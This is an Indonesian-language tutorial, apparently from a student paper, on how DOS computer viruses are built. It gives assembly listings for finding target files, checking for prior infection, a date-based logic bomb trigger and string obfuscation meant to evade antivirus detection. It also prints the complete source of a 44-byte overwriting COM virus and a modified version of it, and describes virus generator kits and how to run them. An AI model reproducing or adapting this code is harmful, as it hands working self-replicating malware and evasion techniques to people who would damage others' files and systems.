Cara kerja virus pada umumnya adalah menyebarkan dirinya dengan salah satu caranya menginfeksi file - file yang di jalankan. Dan sifat virus jika di jalankan, maka ia akan menulari / mengcopy dirinya ke program yang lain. Agar bisa berkerja sebagai virus, maka ia harus memiliki 5 kemampuan yang harus di miliki. 5 kemampuan itu ialah:
1. kemampuan mendapatkan informasi
kemampuan ini memang penting, terutama mengenai file yang akan di infeksi. Hal-hal yang harus di ketahui antara lain:
1. apa Extensi file tersebut, seperti .exe .com .bat
2. atribut file (hidden, readonly, archive)
3. besar file yang akan di infeksi
Informasi tersebut sangat bermanfaat bagi virus, dimana informasi mengenai Extension file berguna untuk virus yang menyerang file-file tertentu contohnya virus yang menyerang file EXE, virus tersebut harus mencari file-file EXE yang akan ditulari.
Informasi attribut berguna untuk memberikan pilihan pada virus apakah dapat menyerang file dengan attribut Read only, Hidden ataukah virus harus mengeset attribut file-file tersebut menjadi Normal, sehingga virus dapat menulari.
Informasi tentang ukuran file berguna untuk operasi matematis yang akan menghitung berapa besar file yang sudah tertular, dimana
Besar_file_terinfeksi = file_asli + Virus_size
Fungsi ini terutama dipakai oleh virus Non OverWriting. Dibawah ini cuplikan metode virus untuk mendapatkan informasi tentang File :
Start : mov dx,offset File_to_infect ; cari seluruh file
Mov ah,4Eh
Mov cx, 3 ; Attribut File ; cari host file
———
int 21h ; Dos Intrupt
cmp ax,12h ; Ada file lagi
je exit ; kalau tidak ada exit
———
file_to_infect db “*.COM” ; File yang akan diinfeksi
ends start ; Akhir kode Virus
Listing Search First File
Dimana Dx menuju ke alamat yang berisi nama file yang akan di infeksi, sedangkan disini di gunakan DOS Interupt 21H dengan Service ah, 4EH yang berguna untuk mencari file pertama yang cocok dengan DX (Find First Matching File), dan mendapatkan informasi tentang file yang berada di dalam directory, biasanya fungsi 4Eh ini selalu berpasangan dengan 4Fh, yaitu fungsi untuk mencari file berikutnya yang cocok (Find Next Matching File), sedangkan nilai CX,3 digunakan untuk mengecek attribut dari file, apakah Hidden, ReadOnly, virus dapt mengeset kembali attribut file menjadi normal, sehingga virus dapat menginfeksi file tersebut.
2. Kemampuan Untuk Memeriksa Program
Kemampuan untuk memeriksa program sangat penting bagi Virus Komputer, karena untuk mengetahui apakah file target sudah tertular atau belum, ini sangat penting karena virus tidak akan menularkan dirinya berkali-kali pada file yang sama, selain untuk mempercepat proses penularan juga untuk menjaga agar file korban tidak rusak, karena apabila penularan dilakukan berulang-ulang pada file yang sama, CRC dari file tersebut akan kacau dan menyebabkan file yang tertular tidak jalan, biasanya file rusak tersebut akan mengeluarkan pesan Divide Over Flow, atau Error in Exe File, selain itu file yang berkali-kali diinfeksi akan bertambah besar, dan akan mencurigakan pemakai komputer.
Berikut ini contoh listing dari kemampuan untuk memeriksa file
Mov ah, 3fh ; Baca file
Mov cx, 3 ; baca 3 byte
Mov dx,3_byte ; simpan pada buffer
Add dx,si ; Nama file
Int 21h ; Dos intrupt
Cmp a,3 ; Cek 3 byte tadi
Jnz cari_lagi ; Jika sudah tertular exit
Jmp Infect ; kalau belum , infect_file
3_byte equ $ ; data 3 byte pertama dari file asli
yang belum tertular
infect_file : ; bagian penginfeksian
———— ; rutin infeksi
int 20h ; Dos Exit function
nop ; No Operation
Listing Periksa File
Pada rutin diatas dapat dilihat bagaimana Virus Komputer memeriksa file korbannya, untuk memberikan identitas file mana yang sudah terinfeksi maupun yang belum, karena dengan memeriksa file korban, umumnya 3 byte pertama yang menandakan file tersebut sudah tertular / belum, 3 byte pertama tersebut umumnya intruksi JMP : offset (Untuk file COM) , kode ‘MZ’ pada header file EXE dan PE untuk File Aplikasi Windows. Rutin ini sangat penting untuk menghindari penularan berkali-kali pada file korban, juga untuk menpercepat penularan. Rutin ini dipakai oleh 90 % virus komputer untuk menularkan diri.
3. Kemampuan untuk menggandakan diri / Replicating
Kemampuan ini merupakan inti utama dari Virus Komputer, karena virus komputer memang diprogram untuk menularkan, dan memperbanyak dirinya. Tugas dari rutin replicating ini adalah menyebarkan virus keseluruh system yang ditularinya, tugas dari rutin ini sangat berat karena rutin tersebut harus mampu menyebarkan virus dengan cepat dan tidak diketahui oleh pemakai komputer, selain itu rutin replicator harus dapat menjaga agar file yang ditularinnya tidak rusak (Rutin untuk Virus Appending / NonOverwriting), dan dapat berjalan sebagaimana mestinnya.
Cara kerja rutin replicator pada file COM lebih sederhana dari file EXE, karena struktur program EXE yang tidak terbatas besarnya yaitu (sebesar memory di komputer), sedangkan file COM hanya dibatasi sampai 64 Kb (Base memory). Rutin replikator pada file COM akan mendeteksi dan mengcopy byte pertama dari file yang akan ditularinya, kedalam suatu daerah di memory, rutin tersebut dipindahkan kedalam daerah lain dalam file.
Pada diagram diatas P1 adalah bagian pertama dari file, P2 adalah bagian kedua dari file korban. P1 harus sama besar dengan V1 (rutin virus) , rutin virus akan menyimpan P1 dan mengcopynya pada bagian akhir dari file.
Setelah itu virus akan mengcopykan bagian pertama dari dirinya (V1) ke bagian awal file korban. Dimana V1 berisi instruksi JMP:V2, yaitu instruksi untuk memanggil
badan Virus yang ada di belakang file korban.
Kemudian virus akan mengcopykan bagian kedunya (V2) yang merupakan badan virus ke akhir file yang ditulari, V2 ini biasanya berisi rutin-rutin lain seperti rutin untuk pengaman, rutin untuk melakukan aksi tertentu dan lain-lain. Rutin tersebut dapat dilihat dibawah ini :
Dalam program dapat diambil contoh 44-Virus.Com, yang merupakan virus sepanjang 44 byte, dengan cara kerja Overwriting file Com yang ada dalam suatu directory sepanjang badan Virus itu sendiri yaitu 44 Byte, virus ini masih sangat sederhana dan belum mempunyai rutin-rutin pengaman, maupun kemampuan untuk memeriksa program, ataupun rutin untuk aksi-aksi tertentu , dalam contoh dibawah ini virus hanya mempunyai kemampuan untuk menulari file Com.
Namun demikian dapat kita lihat bagaimana virus akan berkembang dengan cara menggandakan dirinya dalam program Com.
Berikut ini listing dari 44-Virus.Asm :
Virus segment org 100h ; file COM
assume cs:virus
len equ offset last-100h ;Panjang virus = Akhir program – awal program
start : mov ah,04eh ; Cari file dengan kategori file COM
xor cx,cx ; cx 0, = hanya file dengan atrribut Normal
lea dx,com_mask ; Nama file COM masukan ke register DX
int 21h ; Dos Interupt
open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis
mov dx,9eh
Int 21h
Infect : mov cx,len ; cx diisi panjang badan virus
lea dx,start ; Masukan header Virus “V1″ pada DX
Mov ah,40h ; Tulis badan virus dalam file korban
Int 21h ; Dos Intrupt
Next : mov ah,3eh ; Tutup file korban
int 21h
mov ah,4fh ; Cari file korban lagi
int 21h
jnb open_file ; Apa sudah semua file Com ? kalau belum jmp ke Open_file
; Kalau sudah semua terinfeksi Exit
com_mask: db “*.COM”,0 ; File dengan ekstensi Com
last : db 090h ; Akhir badan virus “V2″
virus ends
end start
Listing Replicating / Penggandaan
4. Kemampuan Mengadakan Manipulasi
Kemampuan untuk mengadakan manipulasi sangat penting dilakukan oleh virus, karena bagian ini sebetulnya yang membuat virus komputer menarik, dan mempunyai seni dalam pembuatannya. Bagian manipulasi atau rutin manipulasi ini banyak macamnya, dan fungsinya, suatu virus dapat mempunyai salah satu diantara rutin-rutin manipulasi ini maupun gabungan antara rutin-rutin manipulasi tersebut. yang pasti, makin banyak rutin manipulasi yang dipakai oleh virus, maka akan makin besar ukuran virus yang dibuat. Diantara rutin-rutin manipulasi yang ada, yang sering digunakan adalah :
1. Menampilkan tulisan / kata-kata / gambar
2. Membunyikan port speaker
3. Time bomb / logic Bomb
Menampilkan Tulisan / gambar
Rutin ini yang paling banyak dipakai oleh pembuat Virus Komputer, karena rutin ini selain untuk kepopularitas virus maupun pembuatnya, juga akan membuat virusnya mudah dikenal oleh para pemakai komputer, selain itu rutin ini membutuhkan suatu kreatifitas tinggi dan jiwa seni dari pembuatnya yang akan membuat virus ini akan menarik. Listing program dibawah ini akan memberikan contoh pembuatan rutin ini.
virus segment org 100h assume cs:virus
len equ offset last-100h ; Panjang virus = Akhir program – awal program
start : jmp mulai
msg db ‘ Modification of 44 Virus ‘,13,10
db ‘ © 2000,iwing[indovirus] ’,13,10
db ‘ – For Educational Only -$’,13,10
mulai : mov ah,09 ; Dos service 09h = Cetak String
lea dx,msg ; dx berisi pesan yang akan dicetak
int 21h ; Dos intrupt
go : mov ah,04eh ; Cari file dengan kategori file COM
xor cx,cx ; cx 0, = hanya file dengan atrribut Normal
lea dx,com_mask ; Nama file COM masukan ke register DX
int 21h ; Dos Intrupt
open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis
mov dx,9eh
Int 21h
infect : mov cx,len ; cx diisi panjang badan virus
lea dx,start ; Masukan header Virus “V1″ pada DX
mov ah,40h ; Tulis badan virus dalam file korban
Int 21h ; Dos Intrupt
Next : mov ah,3eh ; Tutup file korban
int 21h
mov ah,4fh ; Cari file korban lagi
int 21h
jnb open_file ; Apa sudah semua file Com ?,kalau belum jmp ke
Open_file
; Kalau sudah semua terinfeksi Exit
com_mask: db “*.COM”,0 ; File dengan ekstensi Com
last : int 20h ; Akhir badan virus “V2″
virus ends
end start
Listing Rutin Cetak String
Pada listing program virus diatas dapat dilihat, modifikasi dari virus 44 byte Dengan tambahan rutin untuk menampilkan string :
Modification of 44 Virus
© 2000,iwing[indovirus]
-For Educational Only –
setiap kali penularan. Disini dapat dilihat rutin yang menampilkan pesan tadi yaitu :
mulai : mov ah,09 ; Dos service 09h = Cetak String
lea dx,msg ; dx berisi pesan yang akan dicetak
int 21h ; Dos intrupt
walaupun masih sederhana tapi dari sini kita dapat mengembangkan lebih lanjut mengenai rutin ini, antara lain dengan mengabungkan tehnik pewarnaan Palete, maupun dengan cara grafik sinus, yang akan menampilkan gambar.
Rutin Port Speaker
Rutin ini juga banyak di pakai dalam pembuatan Virus Komputer, selain untuk menandakan bahwa virus tersebut sudah menulari file / sudah resident di memory juga untuk menandakan kehadiran virus tersebut. contoh virus yang menggunakan rutin ini adalah Mozzart Virus, yang akan memainkan lagu setiap kali komputer yang terinfeksi di booting.
Start : mov cx,0005h ; counter cx = 5 untuk loop jcxz beep_end ; kalau tidak bunyi keluar mov ax,0E07h ; BIOS karakter = BEL
beep_loop : int 010h ; Bunyikan loop
beep_loop ; bunyikan sampai 5 x
cx =5
beep_end :
end: mov ax,04C00h ; DOS terminate function
int 021h
Listing Port Speaker
Timing Bomb / Logic Bomb
Rutin timing bomb / logic bomb pada virus digunakan melalui sutu rutin kondisi yaitu virus akan melaksanakan rutin tertentu apabila dipenuhi suatu kondisi tertentu, dan kondisi yang umum digunakan adalah tanggal, maupun Counter komputer. Tanggal yang di pakai biasanya tanggal-tanggal istimewa bagi si pembuat virus, atau tanggal istimewa pada kejadian dunia, contohnya tanggal lahir si pembuat virus, hari natal 25 Desember, tahun baru 1 Januari, April mop 1 April, jumat tanggal 13, dan lain sebagainya.
Pada penggunaan kondisi tanggal virus akan beraksi apabila telah dipenuhi kondisi tanggal berapa virus akan melaksanakan aksinya. Contoh virus ini yang terkenal adalah Virus Michael Angelo yang akan merusak data pada tanggal 13 Maret, virus Friday 13th, Have a Nice Day virus, Cristmas virus, dan lainnya..
Perintah utama pada badan virus ini adalah membandingkan counter pada program virus dengan counter pada BIOS Clock ( CMOS ) komputer.
Rutin counter yang biasa terdapat pada virus ini adalah sebagai berikut :
; rutin counter
Xor cx,cx
mov ah,04 ; intrupt ah service 04h, Check tanggal !
int 1A
cmp dx,0101 ; 0101, apakah tanggal 1 januari ?
jz Rutin_aktivasi ; kalau ya , jalankan rutin aktivasi
jmp exit ; kalau bukan tanggal 1 januari, keluar.
Logic bomb
Virus-virus dengan rutin ini biasanya muncul tanpa diketahui oleh user, karena biasanya user tidak mengetahui kalau komputernya terserang virus ini, sampai virus telah mendapatkan kondisi counter yang sesuai dengan rutin aktivasinya, baru virus ini akan menunjukan aktivitasnya, dan biasanya aktivitasnya merusak.
Kemampuan Untuk Menyembunyikan Diri Sendiri
Virus-virus dengan kemampuan untuk menyembunyikan diri sendiri adalah virus-virus buatan programmer yang sudah pengalaman, dan virus yang mempunyai rutin untuk menyembunyikan diri akan sulit untuk dideteksi oleh progam AntiVirus. Tehnik-tehnik yang digunakan adalah dengan Enkripsi. Tehnik enkripsi yang banyak digunakan adalah XoR bit.
Suatu program virus yang ter-enkripsi membutuhkan suatu rutin Dekriptor yang akan mengembalikan susunan program virus yang sudah teracak.
V1 (Header virus berisi instruksi JMP D), yaitu instruksi untuk memanggil rutin dekriptor pada badan virus, rutin ini berfungsi untuk mengembalikan susunan badan virus seperti semula, setelah teracak oleh rutin Enkripsi. Sesudah V2 (Badan Virus) dijalankan baru rutin Enkripsi dipanggil untuk mengacak badan virus V2, baru kemudian kendali diberikan pada program asli.
Rutin ini berfungsi untuk mengacak pesan-pesan dalam badan virus agar tidak mudah dilihat oleh user, sehingga kehadiran virus ini sukar untuk diketahui, selain itu enkripsi digunakan untuk mengacak tanda pengenal virus yang digunakan oleh AntiVirus untuk mengidentifikasi suatu virus, tapi dengan tehnologi sekarang antivirus telah menggunakan tehnik Heuristic Engine yaitu suatu tehnik pengenalan pola virus, yang memudahkan untuk menditeksi virus yang terenkripsi, maka dari itu para programmer virus mengembangkan lagi suatu tehnik yaitu Polimorphic Encription , yaitu sutu tehnik untuk mengenkipsi virus dengan kunci yang teracak, sehingga setiap kali suatu virus menginfeksi file maka rutin Dekriptor dan Enkriptornya berbeda, kebanyakan penggunaan Polymorphic Encription ini menggunakan Timer tic / Clock dalam komputer sebagai kunci untuk mendekripsi dan mengEnkripsi badan virus, sehingga banyak kemungkinan kunci untuk pembuka enkripsi virus, karena itu virus ini semakin sulit untuk dideteksi. Contoh dari tehnik enkripsi ditunjukan dalam listing program dibawah ini :
;——————————————-
; Program : Encrypt.COM
; Contoh Penggunaan Encryption Pada Program
; (C) iwing[indovirus.net]
;——————————————-
.MODEL SMALL
.CODE
org 100h
start :jmp mulai
text db “0RNBIRW$DVEN 9N7AAFCSEUGYI KMMANDPAS p)5C3(”,” “
Text2 db “-4TchBiTsM YfRiWl5eM PiVsa rf6u8l9ldyf meln3cDrvy%pltweed “,0
mulai : mov ah,02 ; Service 02h – Cetak karakter
mov bx,42 ; masukan 42 karakter pada bx
again : mov dl, text[bx] ; masukan data text ke dl
cmp dl,”0″ ; bandingkan dl = 0
jz go_text2 ; kalau dl = 0 jmp ke go_text2
int 21h
dec bx ; bx – 1, nilai bx di kurang 1
dec bx ; bx – 1
jmp again ; lompat ke lagi
go_text2 : mov ah,02 ; service cetak karakter
xor bx,bx ; bx di 0 kan
oke : mov dl,text2[bx] ; masukan data ke dl
cmp dl,0 ; bandingkan dl = 0
jz ending ; kalau dl = 0 loncat ke ending
int 21h
inc bx ; data bx ditambah 1, dx+1
inc bx
jmp oke ;kalau dl bukan 0 loop ke oke
ending : int 20h ; DOS Exit Function
end start
;=====================================================
Listing Enkripsi
Pada program diatas akan menghasilkan output sebagai berikut
D:\DOS>encrypt.com
(C) iwing [ indovirus.net ] -This file is fully encrypted
D:\DOS>_
Namun apabila program tersebut di Debug dengan mengunakan Debug.exe, tidak akan menghasilkan tampilan pesan seperti diatas, yang akan keluar adalah :
D:\DOS>debug encrypt.com
-d
1E59:0100 EB 68 90 30 52 4E 42 49-52 57 24 44 56 45 4E 20 .h.0RNBIRW$DVEN
1E59:0110 39 4E 37 41 41 46 43 53-45 55 47 59 49 20 4B 4D 9N7AAFCSEUGYI KM
1E59:0120 4D 41 4E 44 50 41 53 20-70 29 35 43 33 28 20 2D MANDPAS p)5C3( -
1E59:0130 34 54 63 68 42 69 54 73-4D 20 59 66 52 69 57 6C 4TchBiTsM YfRiWl
1E59:0140 35 65 4D 20 50 69 56 73-61 20 72 66 36 75 38 6C 5eM PiVsa rf6u8l
1E59:0150 39 6C 64 79 66 20 6D 65-6C 6E 33 63 44 72 76 79 9ldyf meln3cDrvy
1E59:0160 25 70 6C 74 77 65 65 64-20 00 B4 02 BB 2A 00 2E %pltweed ….*..
1E59:0170 8A 97 03 01 80 FA 30 74-06 CD 21 4B 4B EB F0 B4 ……0t..!KK…
-d
Listing Debug Encrypt.Com
Pesan yang dihasilkan akan terenkripsi, sehingga program tidak mudah dibajak atau virus tidak mudah diketahui keberadaannya, ini dikarenakan pada program digunakan 2 metode enkripsi, yang pertama program menggunakan tehnik DEC bx yang akan mencetak hanya karakter kelipatan 2 dari mulai sebelah kanan, diakhiri oleh 0 (nol) sebagai kuncinya. Yang kedua program menggunakan tehnik INC bx yaitu hanya menampilkan karakter kelipatan 2 saja yang dimulai dari karakter sebelah kiri, dan diakhiri dengan 0 (nol), sebagai kuncinya.
Enkripsi dengan DEC bx yaitu :
text db “0N[ISWUDREI VNOADFNSIU]Y GKNMINWPIS p)5C3(”,” ”
-> [ S U R I V O D N I ] G N I W I ) C (
Hasilnya : (C) IWING [ INDOVIRUS ]
Enkripsi dengan INC bx yaitu :
Text2 db “-4TchBiTsM YfRiWl5eM PiVsa rf6u8l9ldyf meln3cDrvy%pltweed “,0 –> kunci
-> – T h i s f I l e I s f u l l y e n c r y p t e d
Hasilnya : This file is fully encrypted
Contoh program diatas dapat digunakan untuk tehnik enkripsi pada virus, walaupun sederhana namun cukup efektif untuk menyembunyikan pesan-pesan dalam badan virus.
Virus Generator
Diantara banyak program-program Virus Komputer, sebenarnya yang lebih berbahaya adalah Virus Generator, yaitu suatu program yang membuat virus instant / virus yang sudah jadi, dari sebuah Virus Generator saja dapat dihasilkan puluhan Virus Komputer, yang berbeda jenis dan karakternya, sehingga dalam waktu singkat orang yang mendapatkan virus generator dapat membuat virus seperti yang diinginkannya, tanpa orang tersebut mengerti tentang pemrograman assembler.
Contoh-contoh virus generator yang akan dibahas dalam Penulisan ilmiah ini ada 5 buah, yaitu :
1. VCL ( Virus Creation Laboratory )
2. IVP ( Instan Virus Production Kit )
3. G2
4. NRLG (Nuke Randomic Life Generator)
VCL (Virus Creation Laboratory)
Program virus generator ini menggunakan system menu driven dalam suatu integrated environment, sekilas program ini mirip dengan Turbo Pascal, karena system menunya Pulldown Menu.
Program VCL terdiri menu-menu yaitu : File, Option, Efects, Make, Configuration. Dimana menu file terdiri dari : New, Open, Save, Save As, Change Dir , Information , DOS Shell , dan Quit.
Pada menu Option program VCL, menyediakan berbagai macam jenis virus yang dapat dihasilkan, dan kombinasi antara Efek maupun cara-cara penyebaran antara lain
1. Apending ( Menempel ) Untuk file EXE dan COM
2. Overwriting ( Menimpa) Untuk file EXE dan COM
3. Spawning / Companion , untuk file EXE
4. Logic Bomb
5. Trojan Horse
Selain itu menu Option juga menyediakan cara-cara penyerangan, seperti melalui Directory tree, Curent Directory, Root Directory, juga jumlah penyerangan, seperti menulari 3 file dalam satu kali jalan, enkripsi ,dan lainnya..
Selain itu pada menu Option ini kita dapat memasukan Teks apa saja ke tubuh virus.
Pada menu Efects, program VCL ini menawarkan berbagai macam efect untuk virus.
Selain itu VCL juga menyediakan fasilitas untuk menambah Efect sesuai dengan keinginan kita, dengan cara mengabungkan rutin Efect kita dengan program VCL.
IVP ( Instan Virus Production Kit)
Program IVP yang Penulis ambil adalah yang versi IVP V.1.7, Program IVP ini dibuat oleh Admiral Baily seorang anggota Y.A.M (Youth Agains McAfee). IVP berbeda dengan VCL karena IVP tidak berupa Menu Driven atau Integrated Environment, tapi berbentuk Command Line. Dan kita memerlukan sebuah file Configuration untuk dapat menghasilkan virus. Defaultnya adalah IVP.CFG, yang didalamnya berisi karakteristik Virus yang akan dibuat. Cara pengunaan IVP sangat mudah, pertama kita tentukan dahulu jenis virus yang akan kita buat, semua karakteristik virus, kita masukan dalam file .CFG, seperti nama virus, metode penyerangan, pengaman, rutin aktivasi, efek virus, dan lain-lain. Setelah kita selesai memasukan data-data dalam file konfigurasi, selanjutnya kita menjalankan IVP dalam Command Line , dengan Syntax :
C:\>IVP [Nama_file.CFG]
Setelah itu akan terbentuk file dengan nama sesuai dengan nama yang kita berikan dalam file konfigurasi, dengan Extension .ASM, selanjutnya kita dapat mengkompile file tadi dengan Turbo asembler (TASM) / MASM, setelah itu di link menggunakan Turbo Link (TLINK) / EXE2BIN untuk MASM.
G ²
Program G ² ini di tulis oleh Dark Angel dari Phalcom/SKISM, program G ² ini dikeluarkan setelah Phalcom/SKISM mengeluarkan program virus generator yang terkenal yaitu PS-MPC (Phalcom/SKISM Mass Production Code Generator), cara kerja program G ² ini sama dengan IVP, yaitu menggunakan Command Line, dan membutuhkan file Konfigurasi. Hanya bedanya G ² membutuhkan sebuah file data. File data ini dapat juga digunakan untuk PS-MPC, begitu juga sebaliknya Syntax penulisan G ², yaitu :
C:\>G2.EXE [File_Config1.cfg] [file_config2.cfg]
Contohnya : G2.EXE G2.Dat G2.Cfg
Program G ² ini juga menawarkan berbagai jenis virus, dengan rutin aktivasi, pengaman, metode penyerangan, maupun efek virus yang beraneka ragam, juga menawarkan virus-virus TSR (Terminate And Stay Residence).
NRLG (Nuke Randomic Life Generator)
Program NRLG ini ditulis oleh Azrael dari kelompok [NUKE] Warez, program virus generator ini mempunyai tampilan yang berseni, selain tampilannya yang Integrated Environment yang berupa Pulldown menu, juga bentuk-bentuk hurufnya yang menarik
Dalam main menu NRLG terdapat About, New Monster, Create dan Quit, dimana menu About berisi nama-nama anggota pembuat NRLG dan tempat tinggalnya. Sedangkan menu New Monster berisi jenis-jenis virus yang dapat dihasilkan oleh NRLG, rutin aktivasi, pengaman, berikut Efek-efeknya.
Rutin aktivasi dapat di gunakan tanggal, bulan maupun tahun yang diinginkan, sedangkan pengaman terdiri dari Encription, Directory Stealth, maupun memory stealth, selain itu pengaman juga dilakukan dengan menghapus program anti virus yang ada, baik yang TSR maupun yang ada di Hard Disk.